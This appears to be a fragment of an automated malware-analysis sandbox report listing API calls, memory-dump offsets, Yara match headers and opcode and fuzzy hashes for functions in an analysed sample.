                                                                                        • Instruction Fuzzy Hash: BFF0123A1492096FEB04AEA4EC05A9A379CDF0D650F148825FB08DA490DBB1D540D798
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(ntdll.dll,030FEB54,_alldiv,030FF0B7,80000001,00000000,00989680,00000000,?,?,?,030FE342,00000000,7508EA50,80000001,00000000), ref: 030FEAF2
                                                                                        • GetProcAddress.KERNEL32(76E80000,00000000), ref: 030FEB07
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: ntdll.dll
                                                                                        • API String ID: 2574300362-2227199552
                                                                                        • Opcode ID: 092da2818e93cd40dde10ee16209d921312dad030566d336e223566fd8e64278
                                                                                        • Instruction ID: 6dba2ff22aeec8542e6ce8edd15aad056922460bc8bf33cbf43dc9f018674b3e
                                                                                        • Opcode Fuzzy Hash: 092da2818e93cd40dde10ee16209d921312dad030566d336e223566fd8e64278
                                                                                        • Instruction Fuzzy Hash: 17D0C7386013025FCF59AF65D60A90B7ADC678C7497808455A516C1519DBB4D484D620
                                                                                        APIs
                                                                                          • Part of subcall function 030F2D21: GetModuleHandleA.KERNEL32(00000000,759223A0,?,00000000,030F2F01,?,030F20FF,03102000), ref: 030F2D3A
                                                                                          • Part of subcall function 030F2D21: LoadLibraryA.KERNEL32(?), ref: 030F2D4A
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 030F2F73
                                                                                        • HeapFree.KERNEL32(00000000), ref: 030F2F7A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1017166417-0
                                                                                        • Opcode ID: e7fd4f051ad3f840e5e205631d23feb8a1ee4e8bc1614b35d64bb1ebc76d7632
                                                                                        • Instruction ID: e66f65772fbbbbea1a87c24bd3d92e094efcc11eafd6a6d9765f6d2cf074d332
                                                                                        • Opcode Fuzzy Hash: e7fd4f051ad3f840e5e205631d23feb8a1ee4e8bc1614b35d64bb1ebc76d7632
                                                                                        • Instruction Fuzzy Hash: D051D07990120A9FCF05DF64D8889FAB7B9FF09304F1445A9EE96C7610E732DA19CB90